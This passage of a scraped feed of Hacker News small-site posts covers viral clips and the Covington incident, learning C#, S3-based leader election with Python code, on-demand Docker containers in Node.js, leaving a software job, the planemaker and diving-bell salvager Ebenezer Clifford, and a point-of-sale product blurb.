    This is an event I did see as it unfolded on social media. It was awful. The first clip showed what seemed to be despicable behavior. And it looked like everyone online agreed, including the boys’ school which publicly apologized for their behavior.

    The more I read from alums of Covington catholic about the abuse, bullying and cruelty there, the more I come to believe that the students thuggish behavior is a feature of the school, not a symptom. Just like with all Trumpism – based on bullying, arrogance, and hatred.

    — Kurt Eichenwald (@kurteichenwald) January 20, 2019

    And to all you aggrieved folks who thought this Gillette ad was too much bad-men-shaming, after we just saw it come to life with those awful kids and their fetid smirking harassing that elderly man on the Mall: Go fuck yourselves. https://t.co/ab7zqIuWbL

    — Kara Swisher (@karaswisher) January 19, 2019

    About two days later, the clip flipped. The cause of the flip? Enough people went beyond the clip and watched the entire video. I don’t think many people originally realized that there was a more complete video.

    After viewing the longer video, Swisher would later apologize for what she said. Many others would apologize too.

    I was a complete dolt to put up this and several other obnoxious tweets yesterday without waiting to see the whole video of the incident and I apologize to the kids from Kentucky unilaterally and also for using that clip to make another point about, of all things, a razor ad.

    — Kara Swisher (@karaswisher) January 21, 2019


    But why the need to even have, and share, an opinion of the clip? Could we have taken the clip as first interpreted to be true and still judged it not worthy of attention or outrage?

    Everyone posturing on this terrible website has done stupid, foolish, ignorant and downright horrible things that they surely regret as teenagers and were just fortunate enough to grow up in a world where 99% of people didn’t carry networked cameras.

    — Byron Tau (@ByronTau) January 19, 2019

    In the past, it didn’t matter. There was as much history but there were fewer clips.

    Aftermath: Nick Sandmann and his team are suing news outlets for $275M over the way they propagated a false story, including calls for him to be injured.

    Causes of The Clip

    In the early days of the web, people thought that access to diverse, international viewpoints would lead to less biased information. That view was too simplistic. There are too many causes of the clip for this behavior to disappear.

    The clip is here to stay. Here are some reasons.

    Fitting a story to a situation. This is similar to Richelieu’s (supposed) quote on inventing a story to fit a need. When we fit a story to a situation, we have a likely story in mind and then see a clip that aligns with the story. Just the clip is enough to confirm our belief in the story.

    Biases. If we see what looks like people behaving poorly (or well) and fitting into our expectations, we’re more likely to accept the clip and move on, like the Owens – Lieu examples.

    Time. To truly dig into each story takes too much time to be worth it. How interested are we in finding something closer to the truth? Shouldn’t we trust in others with authority (or the overall market) to show us what is true? New distractions arise constantly. Why spend time digging into this one? That’s the case in each of the above clips.

    Speed. The speed at which a story can evolve online requires effort to keep up to date. The speed at which a story can be shared and promoted lets one top story take over your awareness. By the time a clearer story emerges, we have already moved on to the next one.

    Cameras and Distribution. As a photographer, I’ve long known that you can tell different stories of the same event depending on how you position your camera lens. Afterward, when all that physically remains are the pictures, the best known images get to tell the story. Again, that hits each of the above clips hard.

    No responsibility. There is often little or no downside to weighing in publicly with incomplete information. Or the potential downside, such as the Sandmann lawsuit, is worth risking given the upside of status and supportive business models.

    Business models. Media transitioned from subscription-based to ad-based. That means traffic spikes, exactly what outrage over a story produces, increase media company revenues. Baked into the new media business model, then, is the risk of future downside from spreading information before it is verified. It’s a spikier up-and-down business cycle, but one that seems unavoidable.

    A thought. Perhaps the future of deep fakes will save us from the clip. When anything can be faked realistically, should we trust anything?

    ]]>
    https://unintendedconsequenc.es/the-clip/ hacker-news-small-sites-43226598 Sun, 02 Mar 2025 02:35:45 GMT
    <![CDATA[Learning C# and .NET after two decades of programming]]> thread link) | @Kerrick
    March 1, 2025 | https://kerrick.blog/articles/2025/why-i-am-learning-c-sharp-and-dot-net-after-two-decades-of-programming/ | archive.org

    A photo of a net

    I’ve been programming for over two decades, and I can’t make a full-stack enterprise web application.


    The first lines of code I wrote were in GW-BASIC. When I was in eighth grade, I enrolled in a typing class. Students who finished their typing practice before class ended were given an extra credit opportunity: copying program source code. It was a fantastic test of applied accuracy, and I gladly participated. Eventually I started to pick up on some of the patterns I saw in those BASIC programs. I came up with my own programs—mad libs and simple calculators—and fell in love. I still couldn’t make a web site.

    In high school, the library had a book about HTML. I made my first web pages, and my math teacher helped me put them online. I got a job bagging groceries to pay for a laptop, and used that laptop to develop simple web sites for local businesses. These were the first times I was ever paid to write code, and I was hooked. I still couldn’t make a rich web site.

    When I got to college I learned JavaScript from another book, and CSS from blog posts and documentation web sites. Before I left college I took a job with the Web Design & Support department, implementing a major redesign of the school’s entire web site in HTML and CSS, with a splash of jQuery for interactivity. I still couldn’t make a web application.

    After I left college I scraped together a meager living making Chrome extensions, writing Ruby for freelance clients, and working part-time at Best Buy. I still couldn’t make an enterprise web application.

    By 2013 I had my first career job as a front-end developer at an enterprise Software as a Service business. Thanks to EmberJS, an amazing product team, a top-notch architect, and leadership that understood lean software, I built the front-end of our new platform that, over the next seven years, would become so successful that I’d take on brilliant apprentices, build a team, grow to Engineering Manager, and become Director of Software Engineering. But I still couldn’t make a full-stack enterprise web application.

    When that company got acquired, I laid off half of my team and lost a part of myself. I could no longer stomach working in management, so I left. I had my mid-life crisis: I moved to the country, bought a farm, went back to college online, and tried to create a startup. I realized I was drifting, and that what I wanted was a steady stream of programming work on a great team. I found exactly that, thanks to the CTO of my previous employer. I am now responsible for improving and maintaining an enterprise Angular application powered by a C# / .NET back-end. It’s a bit rough around the edges, but I tidy as I go. I’m the only purely-front-end programmer on a team of twelve. I ship features our customers love, I help the team improve our processes, and I improve the existing legacy Angular application. But I still can’t make a full-stack enterprise web application.


    Last quarter, I learned that our next front-end will use Blazor, not Angular. This means it will use C#, not TypeScript. This quarter, my manager gave me the gift of time: he encouraged me to spend every hour I’m not fixing urgent bugs or implementing important features learning C#, .NET, and Blazor. The company paid for an O’Reilly Learning Platform subscription, and I’ve collected a list of books to study at work. I’ll still spend my nights and weekends improving at my craft, but instead of learning Ruby on Rails, I’ll be reading generally applicable books: Patterns of Enterprise Application Architecture, Domain-Driven Design, Working Effectively with Legacy Code, Object-Oriented Analysis & Design with Applications, Data Modeling Essentials, and Designing Data-Intensive Applications.

    I’ll blog and toot about what I learn as I go, and I hope you’ll join me. I’m learning C# and .NET, but starting from two decades of programming experience and a decade of software engineering experience. I’m learning web development, but starting from a deep knowledge of HTTP, browsers, and the front-end. I’m learning architecture and object-orientation, but starting from a background in structured and functional programming.

    The only thing I love more than learning is my wife. I can’t wait for this learning journey, and I’m excited to share what I learn. Subscribe to my email list and perhaps you’ll learn something too.

    Get notified when I publish new articles

    Get notified when I post new articles. Privacy policy applies.

    ]]>
    https://kerrick.blog/articles/2025/why-i-am-learning-c-sharp-and-dot-net-after-two-decades-of-programming/ hacker-news-small-sites-43226462 Sun, 02 Mar 2025 02:15:18 GMT
    <![CDATA[Leader Election with S3 and If-Match]]> thread link) | @pierremenard
    March 1, 2025 | https://quanttype.net/posts/2025-02-25-leader-election-with-s3-and-if-match.html | archive.org

    Let’s implement leader election using Amazon S3’s If-Match condition by building a distributed lock with it.

    In August 2024, Gunnar Morling published a blog post that shows how to do it with the If-None-Match condition. Back then, If-Match had not yet been released. This post shows another way to solve the same problem.

    The post is intended to stand on its own so you don’t need to read Gunnar’s post first. But do read it as well to see how the solutions compare!

    What’s If-Match

    PutObject is the API call that you use to upload data to Amazon S3. By default, the PutObject calls are upserts: they will replace the object contents or create an object if one does not already exist.

    In 2024, Amazon introduced two conditions for PutObject calls: If-Match (announcement) and If-None-Match (announcement). They allow you to restrict the behavior in the following ways:

    • If you set If-None-Match: *, the call will only succeed if the object does not already exist.
    • If you set If-Match: <value>, the call will only succeed if the object exists and its content has the matching entity tag (ETag) value. An entity tag is essentially a checksum of the object content.1

    DeleteObject also takes the If-Match condition, so you can delete an object only if it has a matching ETag.

    If the call fails, you’ll get a 412 error response (or, in some cases, another 4xx error).

    Together with S3’s consistency guarantees, these conditions allow you to do compare-and-swap (CAS) operations. They are a key building block for distributed systems.
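
    As a minimal sketch of both conditions with boto3 (the bucket and key names here are made up for illustration), note that a failing condition surfaces as a ClientError carrying the PreconditionFailed code:

    import boto3
    import botocore.exceptions

    s3 = boto3.client("s3")

    # Create-only: succeeds only if the object does not exist yet.
    try:
        s3.put_object(Bucket="my-bucket", Key="config.json", Body=b"v1", IfNoneMatch="*")
    except botocore.exceptions.ClientError as e:
        if e.response["Error"]["Code"] == "PreconditionFailed":
            print("someone created the object first")
        else:
            raise

    # Compare-and-swap: succeeds only if the content still matches the ETag we read.
    current = s3.get_object(Bucket="my-bucket", Key="config.json")
    s3.put_object(Bucket="my-bucket", Key="config.json", Body=b"v2", IfMatch=current["ETag"])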

    What’s leader election?

    Many distributed systems require designating one of the nodes as the leader. Typically the leader accepts the write requests from the clients and then sends them to the other nodes that process read requests.

    How do the nodes choose the leader? Martin Kleppmann in Designing Data-Intensive Applications writes:

    One way of electing a leader is to use a lock: every node that starts up tries to acquire the lock, and the one that succeeds becomes the leader.

    If we can build a distributed lock, we can perform leader election. Let’s see how to do that on S3.

    The locking protocol

    We will use a single object in the bucket for locking. Let’s call it lock. It will be a JSON blob that looks like this:

    {
      "expires_at": 1740151473.206179
    }
    

    Here expires_at is a timestamp in seconds since the UNIX epoch for when the lock expires.

    To acquire the lock, the nodes do the following.

    1. Read the contents of lock. If the object does not exist, there’s no lock and we can jump to step 3.
    2. If expires_at is in the past, the lock has expired and we can continue. Otherwise acquiring the lock has failed.
    3. Put a new version of lock with the desired expiration time and with one of the conditions:
      • If lock existed in step 1, use If-Match with its ETag value.
      • If lock did not exist in step 1, use If-None-Match.

    If the put in step 3 succeeds, the node has acquired the lock.

    S3 has strong read-after-write consistency, so if there is a lock, every node is guaranteed to see the up-to-date version of the lock data in step 1. In step 3, the use of the conditions guarantees that only one node will succeed at acquiring the lock.

    If the leader wants to release the lock, it can delete the object using If-Match with the ETag value received in step 3.
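
    A minimal sketch of that release, assuming you kept the ETag from the successful put in step 3 (imports and error-code handling follow the implementation shown below):

    def release_lock(s3_client, bucket: str, key: str, etag: str) -> bool:
        """Delete the lock object only if it still carries the ETag we wrote.

        Returns False if the lock has since been taken over by another node.
        """
        try:
            s3_client.delete_object(Bucket=bucket, Key=key, IfMatch=etag)
        except botocore.exceptions.ClientError as error:
            if error.response["Error"]["Code"] in (
                "ConditionalRequestConflict",
                "PreconditionFailed",
            ):
                return False
            raise
        return True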

    Fencing tokens

    The elephant in the room is that this relies on the nodes having their clocks in sync, which is a famously difficult problem. Consider what happens if the leader’s clock is behind the others or the clock of one of the secondaries is ahead of the others: the leader thinks it still holds the lock while the secondary thinks it has expired. If the secondary now grabs the lock, the former leader can end up issuing zombie requests.

    In his post How to do Distributed Locking, Martin Kleppmann explains that you can use fencing tokens to solve the issue. A fencing token is a number that increases every time a node acquires the lock. The token should be included in the requests to the system that we hold the lock over, and that system should track the highest token it has seen and reject requests with lower tokens. This filters out the zombie requests.
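
    The checking side is not S3-specific. Here is a minimal sketch of what the protected system might do with the token (all names here are illustrative):

    class FencedResource:
        """Tracks the highest fencing token seen and rejects stale writers."""

        def __init__(self) -> None:
            self.highest_token = -1

        def write(self, token: int, payload: bytes) -> None:
            # A zombie leader still presents its old, lower token; refuse it.
            if token < self.highest_token:
                raise PermissionError(f"stale fencing token: {token}")
            self.highest_token = token
            # ... apply the payload here ...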

    In our case, even expires_at could work as a fencing token if the lock duration is always the same. The protocol guarantees that it will always increase.

    However, we do not have to make the lock duration fixed. We can add another field token to the JSON object:

    {
      "expires_at": 1740151473.206179,
      "token": 1
    }
    

    token is a number, starting at zero, that should be incremented every time the lock is acquired. The node acquiring the lock reads it in step 1 and increases it in step 3.

    Releasing the lock by deleting the object does not work anymore, as that would reset the token. You can instead release the lock by setting expires_at to zero without incrementing token.

    {
        "expires_at": 0,
        "token": 1
    }
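
    In code, such a release could look like the sketch below (one possible shape, reusing json and boto3 from the implementation that follows; the full version is left as an exercise further down):

    def release_lock_keeping_token(s3_client, bucket: str, key: str, etag: str, token: int) -> None:
        """Expire the lock immediately while preserving the fencing token."""
        body = json.dumps({"expires_at": 0, "token": token})
        s3_client.put_object(Bucket=bucket, Key=key, Body=body, IfMatch=etag)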
    

    Python implementation

    Here’s a basic implementation in Python using boto3. Adding support for the fencing tokens and releasing the lock is left as an exercise for the reader.

    import dataclasses
    import json
    from dataclasses import dataclass
    from datetime import UTC, datetime, timedelta
    from typing import TYPE_CHECKING, Self
    
    import boto3
    import botocore.exceptions
    
    if TYPE_CHECKING:
        from mypy_boto3_s3.client import S3Client
    
    s3_client: "S3Client" = boto3.client("s3")
    
    
    @dataclass(frozen=True)
    class LockData:
        expires_at: float
    
        def to_json(self) -> str:
            return json.dumps(dataclasses.asdict(self))
    
        @classmethod
        def from_json(cls, data: str) -> Self:
            return cls(**json.loads(data))
    
    
    def acquire_lock(
        s3_client: "S3Client",
        bucket: str,
        key: str = "lock",
        expires_in: timedelta = timedelta(seconds=60),
    ) -> bool:
        """Try to acquire a lock using S3 as the coördination mechanism.
    
        Args:
            s3_client: boto3 S3 client
            bucket: S3 bucket name
            key: S3 object key
            expires_in: Lock timeout as a timedelta
    
        Returns:
            bool: True if the lock was acquired, False otherwise
        """
    
        try:
            existing_lock = s3_client.get_object(
                Bucket=bucket,
                Key=key,
            )
        except botocore.exceptions.ClientError as e:
            if e.response["Error"]["Code"] == "NoSuchKey":
                existing_lock = None
            else:
                raise
    
        if existing_lock is not None:
            existing_data = LockData.from_json(existing_lock["Body"].read().decode("utf-8"))
    
            if datetime.now(UTC).timestamp() <= existing_data.expires_at:
                return False
    
            condition = {"IfMatch": existing_lock["ETag"]}
        else:
            condition = {"IfNoneMatch": "*"}
    
        lock_data = LockData(expires_at=(datetime.now(UTC) + expires_in).timestamp())
    
        try:
            s3_client.put_object(
                Bucket=bucket,
                Key=key,
                Body=lock_data.to_json(),
                **condition,  # type: ignore[arg-type]
            )
        except botocore.exceptions.ClientError as error:
            if error.response["Error"]["Code"] in (
                "ConditionalRequestConflict",
                "PreconditionFailed",
            ):
                # We could alternatively retry on ConditionalRequestConflict (409)
                return False
            raise
    
        return True
    

    Here’s another exercise for the reader: The lock object does not include information about who is holding the lock as it’s not necessary for the protocol. However, it would be handy in a real-world implementation in case you ever need to debug this.

    Does this make sense?

What’s nice about this compared to Gunnar’s version is that there’s no need for a background process to delete the stale lock objects. Gunnar’s design creates a new object every time a lock is acquired, but in this version there’s only a single object that gets modified.

    However, with both designs you have to ask whether they make sense in the real world. As I’ve mentioned before, while S3 storage is fairly inexpensive, the requests are not cheap: in the standard tier and us-east-1 region, PUTs cost $0.005 per 1000 requests and GETs cost $0.0004 per 1000 requests. The latencies are in double-digit milliseconds. S3 Express One Zone makes the requests only 2x cheaper, so it does not materially change the situation.

    This means that if you’re looking to build a high-performance, low-cost distributed lock, S3 is not going to be your first choice. You would probably use it because you’re already using S3 for something else and you want to hold a lock over S3 resources. Unfortunately S3 does not support fencing tokens for PutObject calls, which limits the usefulness of this approach.

This is a companion post for my lightning talk Why S3’s conditional writes made people excited at HYTRADBOI, which shows how to use If-None-Match. It presents an idea similar to Gunnar’s and to what Delta Lake uses in practice.

    Talk errata: The error response for failing condition is 412, not 421 as claimed in the talk.

    Thanks to Joel Kaasinen, Juuso Takalainen, Iivari Äikäs, Waltteri, and Rishit for giving feedback on the talk and thanks to Joel Kaasinen for feedback on this post. Any mistakes are my own.

    Photos: The first one shows a rock and a tree at the frozen Lake Meiko in Kirkkonummi, Finland on a cloudy winter day. The second one is a cliff at Vepsu, a small island in the sea in front of Hamina, Finland.

    ]]>
    https://quanttype.net/posts/2025-02-25-leader-election-with-s3-and-if-match.html hacker-news-small-sites-43226258 Sun, 02 Mar 2025 01:48:52 GMT
    <![CDATA[On-Demand Docker Containers with Node.js]]> thread link) | @codehammer
    March 1, 2025 | https://www.hammerbot.fr/en/articles/on-demand-containers-with-nodejs | archive.org


Have you ever wondered how Google Cloud Run magically scales your services down to zero and still manages to respond to incoming requests instantly? It feels like serverless magic, but under the hood, it's powered by Knative—a technology that lets Kubernetes dynamically start and stop containers on demand.

    Wouldn’t it be awesome to build something like that ourselves?

    Today, we’re going to roll up our sleeves and create a Node.js-powered on-demand container system. 💡 We’ll:

    ✅ Start a container only when needed

    ✅ Forward incoming requests to it

✅ Auto-stop the container after inactivity

    ✅ Handle errors gracefully

    Let’s go! 🚀



    Step 1: The Simplest Server in a Container 🛠️

    First, let’s create a tiny HTTP server that will run inside our container.

    📄 server.js

    import http from "http";
    
    const hostname = "0.0.0.0";
    const port = 3000;
    
    const server = http.createServer((req, res) => {
      res.statusCode = 200;
      res.setHeader("Content-Type", "text/plain");
      res.end("Hello from your on-demand container!\n");
    });
    
    server.listen(port, hostname, () => {
      console.log(`Server running at http://${hostname}:${port}/`);
    });
    


    Now, let’s dockerize it.

    📄 Dockerfile

    FROM node:22
    WORKDIR /app
    COPY ./server.js ./server.js
    CMD ["node", "server.js"]
    


    Build the image:

    docker build . -t simple-server:local
    



    Step 2: The Magic—Dynamically Starting a Container 🎩✨

    Now, let’s write a script that:

    • Listens for HTTP requests
    • Checks if the container is running
    • Starts it if needed
    • Forwards requests to the container

    📄 index.js

    import http from "node:http";
    import { proxyRequest, isPortOpen, startContainer, stopContainer } from "./utils.js";
    
    const CONTAINER_PORT = 8080;
    const INACTIVITY_TIMEOUT = 30_000; // 30 seconds
    let lastRequestTime = Date.now();
    let containerRunning = false;
    
    const httpServer = http.createServer(async (req, res) => {
      console.log("➡️ Incoming request detected...");
      lastRequestTime = Date.now();
    
  if (!(await isPortOpen(CONTAINER_PORT))) {
    console.log("🚀 Container is not running. Starting it now...");
    await startContainer();
  }
  // Mark the container as running even when it was already up, so the
  // inactivity timer can stop it later.
  containerRunning = true;
    
      console.log("🔁 Forwarding request to container...");
      return proxyRequest({ req, res, port: CONTAINER_PORT, host: "localhost" });
    });
    
    // Periodically check for inactivity
    setInterval(async () => {
      if (containerRunning && Date.now() - lastRequestTime > INACTIVITY_TIMEOUT) {
        console.log("🛑 No activity detected. Stopping container...");
        await stopContainer();
        containerRunning = false;
      }
    }, 5_000); // Check every 5 seconds
    
    httpServer.listen(3000, "127.0.0.1", () => {
      console.log("🌐 On-Demand Proxy Server listening on http://127.0.0.1:3000");
    });
    



    Step 3: Container Management Functions 🏗️

    📄 utils.js

import { spawn, exec } from "node:child_process";
import http from "node:http";
import net from "node:net";
    
    export function startContainer() {
      return new Promise((resolve) => {
        const process = spawn("docker", ["run", "--rm", "-p", "8080:3000", "simple-server:local"], {
          stdio: "inherit",
        });
        process.on("spawn", resolve);
      });
    }
    
    export function stopContainer() {
      return new Promise((resolve, reject) => {
        exec("docker ps -q --filter ancestor=simple-server:local", (err, stdout) => {
          if (err) return reject(err);
          if (!stdout.trim()) return resolve(); // No container found
    
          exec(`docker stop ${stdout.trim()}`, (err) => {
            if (err) return reject(err);
            console.log("✅ Container stopped.");
            resolve();
          });
        });
      });
    }
    
    export function isPortOpen(port, host = "127.0.0.1") {
      return new Promise((resolve) => {
        const socket = new net.Socket();
    
        socket.setTimeout(1000);
        socket.once("connect", () => {
          socket.destroy();
          resolve(true);
        });
        socket.once("timeout", () => {
          socket.destroy();
          resolve(false);
        });
        socket.once("error", () => {
          socket.destroy();
          resolve(false);
        });
    
        socket.connect(port, host);
      });
    }
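
// index.js imports proxyRequest from this file, but the post omits its
// body. The following is a minimal sketch (my assumption, not the
// author's code): it forwards the incoming request to the container and
// streams the response back, with basic error handling. Note that
// startContainer resolves on "spawn", so a first request can still race
// the server inside the container coming up.
export function proxyRequest({ req, res, port, host }) {
  const options = {
    host,
    port,
    path: req.url,
    method: req.method,
    headers: req.headers,
  };

  const upstream = http.request(options, (upstreamRes) => {
    res.writeHead(upstreamRes.statusCode, upstreamRes.headers);
    upstreamRes.pipe(res);
  });

  upstream.on("error", (err) => {
    console.error("❌ Proxy error:", err.message);
    if (!res.headersSent) {
      res.statusCode = 502;
    }
    res.end("Bad Gateway\n");
  });

  req.pipe(upstream);
}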
    



    Step 4: Time for a Test 🧪

    Fire up your Node.js proxy server:

    node index.js
    


    Then, make a request:

    curl http://localhost:3000
    


    🎉 You should see the container start up, handle the request, and return:

    Hello from your on-demand container!
    


    Wait 30 seconds without sending requests, and check the logs—you’ll see:

    🛑 No activity detected. Stopping container...
    ✅ Container stopped.
    


    Now, try the request again, and watch it restart automatically!


    🚀 Wrapping Up

We've built a simple but powerful system that:

✅ Dynamically starts a container when needed

✅ Forwards HTTP requests to the container

✅ Stops the container after a period of inactivity

✅ Handles errors properly and avoids unnecessary resource usage

This is a lightweight alternative to serverless environments like Cloud Run, but it runs on your own infrastructure.

    👉 Want more? Let me know in the comments! We could:

    • Improve startup time using container warm-up techniques 🥶➡️🔥
    • Implement multiple containers for high availability 💪
    • Use WebSockets for real-time interactions 📡

    Thanks for reading! 🚀


    ]]>
    https://www.hammerbot.fr/en/articles/on-demand-containers-with-nodejs hacker-news-small-sites-43226113 Sun, 02 Mar 2025 01:23:31 GMT
    <![CDATA[Mozilla site down due to "overdue hosting payments" [fixed]]]> thread link) | @motownphilly
    March 1, 2025 | https://linuxmom.net/@vkc/114089626244932902 | archive.org

    Unable to extract article]]>
    https://linuxmom.net/@vkc/114089626244932902 hacker-news-small-sites-43226089 Sun, 02 Mar 2025 01:20:17 GMT
    <![CDATA[I'm done with coding]]> thread link) | @neelc
    March 1, 2025 | https://www.neelc.org/2025/03/01/im-done-with-coding/ | archive.org

    In my high school days, I was a huge server and networking person. My homelab was basically my identity, and not even a good one: consumer-level networking gear running Tomato and a then-7-year-old homebuilt desktop PC running FreeBSD.

    Then I joined NYU’s Tandon School of Engineering for Computer Science. It was a full 180 into software engineering. I didn’t just code for assignments, I started with toy projects and went to major Tor contributions writing very complex patches, had two internships and ultimately a job at Microsoft.

    Primarily due to “Big Data” experience at NYU CUSP, Microsoft placed me on the Viva Insights team. I’ve always hated the product, feeling it was unnecessary surveillance. I wanted out.

In fact, my disdain for Viva Insights was strong enough to make me lose my passion for coding and fall into obsessive browsing and shopping, because facing the music of working on a surveillance product would bother me even more. Open source work outside of package maintenance went to zero.

    I’ve tried to discuss this with my mom, and she kept telling me how “lucky” I am for working at Microsoft saying “it’s big tech” and “you’re neurodivergent” and “you won’t survive at a smaller company.” She even bought into the marketing material telling me how it’s “not surveillance.”

I’ve decided that in the shitty job market, it’s not worth staying a software engineer, even if leaving means I make much less. Part of it is being “specialized” in over-glorified surveillance: even if I change employers, what’s the guarantee I won’t be working on another surveillance product? Assuming I can even get another job.

    In fact, I’ll just live off dividend income and try to get my new IT startup Fourplex off the ground. Sure, I won’t be able to buy shiny homelab equipment as often as I did in the past, but I at least have the guarantee I’m not working on an unethical product.

    While six figures is certainly nice, it’s only nice if it’s ethically done. I’d much rather flip burgers or bag groceries than work on surveillance for six figures. After all, Edward Snowden had a “stable” federal government job (not so stable now thanks to “DOGE”) and he gave it up to stand up for the right to privacy.

    And I care more for my values than the name or salary. It’s not like I use Windows at home, I haven’t since 2012. I kept self-hosting email despite having worked at Microsoft 365 and still do even now. And I sacrificed job performance for my values of strong privacy.

Little did I know that my father (who was previously a big Big Data and AI advocate) would come to hate Viva Insights. He says it’s “bullshit” and nobody uses it. Even when I worked at Microsoft I never used it. Not even once. It’s bloatware. Microsoft is 100% better off porting Office apps to Linux (despite me using a Mac now) or beefing up cybersecurity.

    ]]>
    https://www.neelc.org/2025/03/01/im-done-with-coding/ hacker-news-small-sites-43225901 Sun, 02 Mar 2025 00:49:27 GMT
    <![CDATA[The Planemaker Who Walked Beneath the Water]]> thread link) | @unix2038
    March 1, 2025 | https://workingwoodenplanes.com/p/2025-02-28-ebenezer-clifford-bell-diver-planemaker/ | archive.org

    The pages of A Guide to American Wooden Planes are filled with the biographies of planemakers who worked in wildly varying professions, from music teachers to mail clerks. But I know of no other planemaker with a resume like Ebenezer Clifford, architect, master joiner, bell diver, cabinetmaker, turner, justice of the peace, and quartermaster sergeant in the Revolutionary War.

    Born on Oct. 29, 1746 into a family of carpenters, Clifford lived the first half of his life in Kensington, New Hampshire. By the time he was in his 20s, he was likely a well-known joiner. A paneled room he is said to have built in 1774 was eventually purchased by the Metropolitan Museum of Art, dismantled, and displayed in its American Wing. (The New York Times called it “one of the best examples of early American paneling in existence.”) At the outbreak of the Revolutionary War in 1775, he enlisted in the 2nd New Hampshire Regiment and possibly took part in the siege of Boston. He served as quartermaster sergeant until he left the army in 1777. 1

    Ebenezer Clifford's joinery work in the stair hall of the Governor John Langdon House in Portsmouth, New Hampshire. Photo: Historic New England.

    When he got home, he went straight back to work as a joiner. In 1777, he built a staircase for a Deerfield farmer, charging £1-8-0 for his time, another £2-9-0 for “my servt” (likely an apprentice), and another £1-11-0 for turning 31 balusters. Clifford bought two “Cornish [crown molding] irons” and a “Cornish bed mold Plain Iron” in 1784 when he worked as a joiner on the stair hall in the Governor John Langdon Mansion. (He served as a justice of the peace for Rockingham Co., Mass. that same year.) The volume of wood he was purchasing at the time — “1,600 board feet of cherry, 900 feet of maple, and 900 feet of birch” in 1788 and 1789 — speaks to his output as a cabinetmaker. In 1788, he sold a “Cherrytree” clock case, a “Mahogany Stand Table,” six chairs, and an 18-inch “Mahogany Teaboard.” His surviving planes are all from this time period. A local blacksmith’s account books shows him buying more than 200 plane irons between 1772 and 1794.2

    Clifford moved to Exeter, New Hampshire, in 1793, and began focusing on more than construction. (His personal library at the time included architectural books like the 1756 edition of Plans, Elevations, And Sections, Of Noblemen And Gentlemen’s Houses.) He designed, or co-designed with builder-architect Bradbury Johnson, a number of buildings that still stand. They both worked as master joiners for the Phillips Exeter Academy in 1794, with Clifford being paid £234-16-11. Clifford designed the building and Johnson designed the cupola. Both men are credited with planning the Congregational Church in Exeter in 1798. Either Johnson or Clifford worked as the master joiner for the Samuel Tenney House in 1800. The only known building whose design can be solely credited to Clifford is the Atkinson Academy, built in 1803 when he was 57 years old.3

    It was around this time Clifford’s interests turned to sub-marine exploration. He used a diving bell to salvage silver coins from a shipwreck at the Isles of Shoals, about six miles off the coast of New Hampshire in the Atlantic Ocean. It’s unknown what vessel the coins came from, but the money had been submerged long enough that it was encrusted with marine life. In 1803, Clifford and Richard Tripe of Dover tried to raise a sunken gundalow (a type of sailing barge) on the Piscataqua River. They made 12 dives in their bell, attaching cables to the hull of the barge in 72 feet of water. Unfortunately, a ship collided with the cables, shattering the barge’s hull. 4

    An 18th century diving bell.

    The salvage was a failure; they were only able to bring up a few iron bars from the ship’s cargo. But Clifford enjoyed his time underwater. His chronic rheumatism was so improved by the increased pressure at the bottom of the river that he was able to walk six miles after a dive. The bell was 5-feet 9-inches tall and 5 feet across at the base, with two seats and a footrest made from an anchor. With their signal buoy — a full-size hand-carved wooden swan — floating above them, the men were slowly lowered to the bottom over the course of 20 minutes. As they probed the river bottom, fish gathered around them like “a flock of chickens.” 5

    In 1808, Clifford and Samuel Palmer of Milton received permission from the state of Massachusetts to conduct salvage operations on the Penobscot River where the British had sunk 44 American ships during the Revolutionary War. Palmer was no stranger to diving bells. He had unsuccessfully tried to raise sunken cargo in the Portsmouth River and a lake. Over the next few years, they retrieved “36 pieces of cannon, a brass howitzer, and several tons of cannon balls.” In 1810, the state paid the men $2,078.84 for the metal (about $53,700 today). 6

    When Clifford began working on the Penobscot River, Tripe, his original diving partner, sued. Tripe had received a patent (Improvements in Diving Machines, #681) on April 1, 1806, for an apparatus that provided air to a diving bell. In his lawsuit, he claimed Clifford had used his invention. The outcome of the case is unknown. Confusingly, a story ran in the Boston Centinel in 1810 (and was subsequently reprinted in newspapers in Pennsylvania, Maryland and North Carolina) crediting Clifford, not Tripe, for having “invented an improved [and] ingenious Diving Bell, of a new construction.” Clifford may have been involved with salvage efforts after 1810. An 1811 article in a New York City newspaper described ongoing work by a “Mr. Palmer” and “the company who own the Diving Bell” to raise parts of the wrecked British frigate Hussar in the East River.7

    Following several years of declining health, Clifford died on October 10, 1821, at the age of 74. A state legislator recalled his father attending an auction in 1878 at the old Clifford home “when the last of the fourth generation of cabinetmakers sold the place.” His account includes this heartbreaking detail: “A farmer bought their old planes and tools for firewood, many of them then over 100 years old — he had to go twice with a two horse wagon to haul them home.”8


    A Brass Ribbon Plow Plane

    Ohio Tool plow plane with a brass ribbon on its side

    This is the first time I’ve seen this kind of decoration on a plane, and I’d love to know if anyone has ever spotted something similar. (You can reply to this email or find other ways to contact me here.) It was made by the Ohio Tool Co., with a G. Baurmann, Louisville, Kentucky mark. I don’t believe Ohio Tool ever offered a plane with brass decorations, so I assume it was put on by Baurmann.

    Gustave Baurmann (1817-1884) was a Louisville, Kentucky, hardware, cutlery, and gun dealer. He was born in Prussia and immigrated to the United States as a young man. He was part of several hardware partnerships, eventually opening his own business — G. Baurmann & Co. — in 1854. After the end of the Civil War, Baurmann hired local architect Henry Whitestone to design a store for him at 741 West Main St., as well as a spacious 14-room home on Market St. In 1870, he owned $40,765 worth of property in the city. Louisville was home to a large German community in the 1800s. Baurmann took an active part in it, including serving as the treasurer for the local opera house. He sold his business to Harvey, Girdler & Co. in 1872; two years later he put his house up for sale and traveled to Europe. The 1880 federal census lists six Baurmann children, three girls and three boys, aged 9-20. Baurmann died in 1884 and is buried in Louisville’s Cave Hill Cemetery.


    ]]>
    https://workingwoodenplanes.com/p/2025-02-28-ebenezer-clifford-bell-diver-planemaker/ hacker-news-small-sites-43225805 Sun, 02 Mar 2025 00:34:57 GMT
    <![CDATA[POSimple]]> thread link) | @scologic
    March 1, 2025 | https://posimple.net/index.php | archive.org

POSimple: The Smarter Way to Manage Sales, Compliance & Growth.

    Built for modern businesses across retail, hospitality,
    events and regulated industries.

    POSimple adapts, scales, and simplifies operations
    without the hidden costs.

    Fast setup, real-time analytics, and built-in compliance

    Welcome to POSimple:

    Simplify. Scale. Succeed.

    The All-in-One EPOS Solution built for performance, growth, and seamless business management.

    At POSimple, we believe technology should make running your business easier—not more complicated. Designed by industry experts, our customizable, cloud-based EPOS software delivers the tools you need to sell smarter, scale effortlessly, and stay ahead of the competition. Whether you're managing a single store, a multi-location franchise, or a dynamic hospitality venue, POSimple is the reliable partner you can count on.

